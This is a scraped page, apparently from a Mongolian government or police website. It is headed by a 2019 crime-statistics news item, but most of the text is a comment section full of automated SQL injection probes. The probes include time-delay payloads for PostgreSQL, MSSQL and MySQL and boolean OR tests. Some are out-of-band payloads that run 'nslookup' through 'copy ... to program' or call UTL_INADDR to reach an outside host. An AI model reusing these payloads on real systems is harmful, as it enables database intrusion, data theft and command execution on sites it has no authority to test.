• Нүүр хуудас
  • Системүүд
  • Харьяа нэгжүүд
  • Холбоо барих
  • Асуулт хариулт
  • Иргэний хяналт

УЛСЫН ХЭМЖЭЭНД 2019 ОНЫ ЭХНИЙ 3 САРД БҮРТГЭГДСЭН ГЭМТ ХЭРЭГ, ЗӨРЧЛИЙН МЭДЭЭ

2019-04-05
УЛСЫН ХЭМЖЭЭНД 2019 ОНЫ ЭХНИЙ 3 САРД БҮРТГЭГДСЭН ГЭМТ ХЭРЭГ, ЗӨРЧЛИЙН МЭДЭЭ
zbdrariI YicEXfAe';select pg_sleep(3); --
2019-09-17 Хариулах
zbdrariI Kb31mCZo');select pg_sleep(6); --
2019-09-17 Хариулах
zbdrariI hM0UEj7N'));select pg_sleep(9); --
2019-09-17 Хариулах
zbdrariI -1));select pg_sleep(3); --
2019-09-17 Хариулах
zbdrariI -1); waitfor delay '0:0:3' --
2019-09-17 Хариулах
zbdrariI 1 waitfor delay '0:0:6' --
2019-09-17 Хариулах
zbdrariI Wx8k2UJg'; waitfor delay '0:0:6' --
2019-09-17 Хариулах
zbdrariI -1;select pg_sleep(9); --
2019-09-17 Хариулах
zbdrariI -1);select pg_sleep(9); --
2019-09-17 Хариулах
zbdrariI if(now()=sysdate(),sleep(6),0)
2019-09-17 Хариулах
zbdrariI 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
2019-09-17 Хариулах
zbdrariI 0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z
2019-09-17 Хариулах
zbdrariI (select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/
2019-09-17 Хариулах
zbdrariI -1; waitfor delay '0:0:3' --
2019-09-17 Хариулах
zbdrariI 1||UTL_INADDR.get_host_address('dns.'||'sqli.070005.1-85197.1.30bc3.1.bxss'||'.me')
2019-09-17 Хариулах
zbdrariI '||UTL_INADDR.get_host_address('dns.'||'sqli.070005.1-85199.1.30bc3.1.bxss'||'.me')||'
2019-09-17 Хариулах
zbdrariI 1;copy (select '') to program 'nslookup dns.sqli.\070005.1-85200.1.30bc3.\1.bxss.me'
2019-09-17 Хариулах
zbdrariI 1';copy (select '') to program 'nslookup dns.sqli.\070005.1-85202.1.30bc3.\1.bxss.me
2019-09-17 Хариулах
zbdrariI 526'
2019-09-17 Хариулах
zbdrariI -1' OR 3+287-287-1=0+0+0+1 --
2019-09-17 Хариулах
zbdrariI -1' OR 2+840-840-1=0+0+0+1 or 'iKKnbdmR'='
2019-09-17 Хариулах
zbdrariI -1' OR 3+840-840-1=0+0+0+1 or 'iKKnbdmR'='
2019-09-17 Хариулах
zbdrariI -1" OR 2+216-216-1=0+0+0+1 --
2019-09-17 Хариулах
zbdrariI -1" OR 3+216-216-1=0+0+0+1 --
2019-09-17 Хариулах
zbdrariI -1 OR 2+623-623-1=0+0+0+1
2019-09-17 Хариулах
zbdrariI -1 OR 3+623-623-1=0+0+0+1
2019-09-17 Хариулах
zbdrariI -1' OR 2+287-287-1=0+0+0+1 --
2019-09-17 Хариулах
zbdrariI 1
2019-09-17 Хариулах
zbdrariI 1
2019-09-17 Хариулах
zbdrariI 7J6asJNn
2019-09-17 Хариулах